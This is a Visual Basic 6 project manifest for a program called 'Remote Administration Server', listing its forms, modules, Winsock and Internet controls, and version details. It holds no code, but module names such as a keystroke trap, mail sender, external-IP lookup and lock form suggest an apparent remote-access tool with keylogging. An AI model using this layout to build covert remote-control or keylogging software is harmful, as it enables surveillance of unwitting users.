Type=Exe
Form=frmServer.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\WINNT\system32\stdole2.tlb#OLE Automation
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Object={6FBA474E-43AC-11CE-9A0E-00AA0062BB4C}#1.0#0; SYSINFO.OCX
Module=modFunctions; modFunctions.bas
Module=modEnumDrives; modEnumDrives.bas
Module=modAPIS; modAPIS.bas
Module=modFiles; modFiles.bas
Module=modktrap; modKeytrap.bas
Form=frmChat.frm
Object={48E59290-9880-11CF-9754-00AA00C00908}#1.0#0; MSINET.OCX
Form=frmOptions.frm
Module=modRegistry; modRegistry.bas
Form=frmAbout.frm
Module=modMailz; modMailz.bas
Module=modExternalIP; modExternalIP.bas
Form=frmMail.frm
Form=frmLock.frm
IconForm="frmServer"
Startup="frmServer"
HelpFile=""
Title="RemoteAdminServer"
ExeName32="Remote Administration (Server).exe"
Command32=""
Name="RemoteAdminServer"
HelpContextID="0"
CompatibleMode="0"
MajorVer=5
MinorVer=0
RevisionVer=1
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="Remote Administration Server"
VersionCompanyName="Usssssy, Inc."
VersionFileDescription="Complete Server For Remote Administration via the Internet or LAN"
VersionLegalCopyright="All Rights Reserved"
VersionLegalTrademarks="Usssssy, Inc."
VersionProductName="Remote Admin Server"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1
